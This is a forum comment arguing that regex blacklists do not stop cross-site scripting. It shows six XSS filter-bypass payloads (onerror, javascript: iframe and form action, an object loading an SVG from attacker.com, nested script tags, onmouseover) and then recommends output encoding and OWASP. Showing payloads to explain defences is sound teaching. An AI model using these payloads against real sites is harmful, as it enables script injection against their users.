Comment Re:Regular expressions (Score 4, Interesting) 41
<img src="xss" onerror="alert('Nope!')"
<iframe src="javascript:alert('That won't work.')"></iframe>
<object data="http://attacker.com/SvgCanContainScriptsAndCanUseTheParentObjectToAttackTheHostingPage.svg"></object>
<scri<scriptpt>alert("In fact, that kind of blacklisting is trivial to bypass.");</script>
<form action="javascript:alert('I once spent a month breaking a client's blacklist every time they updated it to block my last POC exploit, telling them all the while they had to use output encoding.');"><input type="submit" value="SPOILER"
<h1 onmouseover="alert('They eventually did, but oh man did they waste a lot of time trying variants on your suggestion first!')">REALLY BIG TEXT THAT YOUR MOUSE WILL GO OVER</h1>
People thinking like you do frequently leads to exactly this sort of problem, where something *supposedly* has XSS protection but in fact totally doesn't. With the possible exception of the nested script tags (if you're smart enough to run the filter repeatedly until no further hits occur, that'll be caught), every single one of these lines will execute arbitrary attacker-controlled JavaScript through the filter that you propose. I strongly recommend that you go read OWASP, especially the top 10, and in the meantime I hope you haven't written any in-production web applications...